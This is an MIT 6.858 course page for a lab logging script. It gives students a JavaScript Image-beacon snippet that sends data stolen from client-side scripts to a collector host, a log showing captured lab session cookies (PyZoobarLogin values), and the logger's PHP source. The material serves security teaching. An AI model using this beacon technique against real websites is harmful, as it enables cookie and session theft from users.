Lab 4 Logging Script

You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


(some identifier to locate your payload in the log)


(the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Thu, 08 Feb 2024 19:56:52 -0500: my-username: some-string
Thu, 08 Feb 2024 17:27:41 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 17:20:46 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 16:50:11 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:40 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:26 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:17 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:09 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:50:28 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:43:03 -0500: rollhens: PyZoobarLogin=attacker#239acc7bc484d98518569b656afdab9d
Thu, 08 Feb 2024 14:23:48 -0500: my-username: some-string
Thu, 08 Feb 2024 14:14:08 -0500: my-username: some-string
Thu, 08 Feb 2024 14:12:32 -0500: rollhens: anything
Thu, 08 Feb 2024 14:11:47 -0500: rollhens: grader#6f48488db081f989df80914e49b45e83
Tue, 23 Jan 2024 03:52:09 -0500: test: PyZoobarLogin=grader#fd6c8a524f411982bd4f35624ffeb631
Tue, 23 Jan 2024 03:52:04 -0500: test: PyZoobarLogin=grader#8ad06fac69108b9eb668b0e9547fae22
Tue, 23 Jan 2024 03:51:55 -0500: test: PyZoobarLogin=grader#0d7b7b55efe4de39d32cd5e42560f015
Tue, 23 Jan 2024 03:46:40 -0500: test: PyZoobarLogin=grader#1b99b3224cfa192f75f92b0a0faea40f
Tue, 23 Jan 2024 03:46:35 -0500: test: PyZoobarLogin=grader#ea844c2f531bec27c0bdcb23cb7952a9
Tue, 23 Jan 2024 03:46:26 -0500: test: PyZoobarLogin=grader#f950b04232ef4e8c85b4d65288d04d45
Tue, 23 Jan 2024 03:26:21 -0500: test: PyZoobarLogin=grader#a647d38c4f85735565c8bd477aa678ea
Tue, 23 Jan 2024 03:26:16 -0500: test: PyZoobarLogin=grader#89aaf043051a98511c2fec0ec6935c94
Tue, 23 Jan 2024 03:26:06 -0500: test: PyZoobarLogin=grader#25dd0471c0576af3c4cf787f1f93759b
Tue, 23 Jan 2024 03:19:39 -0500: test: www-www
Tue, 23 Jan 2024 03:18:17 -0500: test: 111-111
Tue, 23 Jan 2024 03:17:22 -0500: test: testtestst-2
Tue, 23 Jan 2024 03:10:16 -0500: test: 1234-12345
Tue, 23 Jan 2024 03:03:44 -0500: test: 12345-12345
Tue, 23 Jan 2024 03:02:54 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:56:38 -0500: test: 123-12345
Tue, 23 Jan 2024 02:39:25 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:19 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:13 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:07 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:01 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:34:30 -0500: test: test-test2
Tue, 23 Jan 2024 02:26:20 -0500: test: 123-12345
Tue, 23 Jan 2024 02:25:47 -0500: test: 123-12345
Tue, 23 Jan 2024 02:25:27 -0500: test: 123-
Tue, 23 Jan 2024 02:21:19 -0500: test: 123-1234
Tue, 23 Jan 2024 02:21:16 -0500: test: 123-
Tue, 23 Jan 2024 02:00:20 -0500: test: PyZoobarLogin=test#2c163d25cdb449efd8a5b7f2983b0862
Tue, 23 Jan 2024 01:58:45 -0500: test: PyZoobarLogin=test#2c163d25cdb449efd8a5b7f2983b0862
Tue, 23 Jan 2024 01:40:41 -0500: test: PyZoobarLogin=grader#2f8e65d359b1559a3b273cf950dab4e1
Tue, 23 Jan 2024 01:40:35 -0500: test: PyZoobarLogin=grader#db5ffcaeaba860b69edb3638b6650e52
Tue, 23 Jan 2024 01:40:26 -0500: test: PyZoobarLogin=grader#cf4d3d683d01a5e7cb1f79cd55b51a67
Tue, 23 Jan 2024 01:39:46 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8
Tue, 23 Jan 2024 01:35:27 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8
Tue, 23 Jan 2024 01:23:30 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8

Source code

In case you are curious, here is the source code of this page.


<?php
do {
    if (!
array_key_exists("id"$_REQUEST)) {
        break;
    }

    
$id $_REQUEST['id'];
    if (
strlen($id) > 1000) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"ID value is larger than 1000 bytes";
        return;
    }

    if (!
array_key_exists("payload"$_REQUEST)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"No payload given";
        return;
    }

    
$payload $_REQUEST['payload'];
    if (empty(
$payload)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"Empty payload given";
        return;
    }

    if (
strlen($payload) > 1000) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"Payload is larger than 1000 bytes";
        return;
    }

    if (!
function_exists('apcu_add')) {
        
header("HTTP/1.0 501 Not Implemented");
        echo 
"APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (
apcu_add($payloadtrue5) === false) {
        
// exact same $payload was sent in the past 5 seconds
        
header("HTTP/1.0 429 Too Many Requests");
        echo 
"That exact payload was sent very recently; rejecting";
        return;
    }

    
$payload str_replace(array("\n""\r"), '.'$payload);
    
$id str_replace(array("\n""\r"), '.'$id);

    
$file fopen("/tmp/6.858-logger.txt""c+");
    if (
$file === false) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to open log file";
        return;
    }

    if (!
flock($fileLOCK_EX)) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to lock log file";
        return;
    }

    
$lines = array();
    while (!
feof($file) && count($lines) < 100) {
        
$lines[] = fgets($file);
    }
    
ftruncate($file0);
    
rewind($file);
    
fwrite($filedate(DATE_RFC2822) . ": " $id ": " $payload "\n");
    foreach (
$lines as &$line) {
        
fwrite($file$line);
    }

    
flock($fileLOCK_UN);
    
fclose($file);

    echo 
"Logged!";
    return;
} while(
0);

$link "(new Image()).src="
      
"'https://css.csail.mit.edu/6.858/2022/labs/log.php?'"
      
" + 'id=my-username'"
      
" + '&payload=some-string' + '&random='"
      
" + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines 
file_get_contents("/tmp/6.858-logger.txt");
        echo 
htmlspecialchars($lines);
    
?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>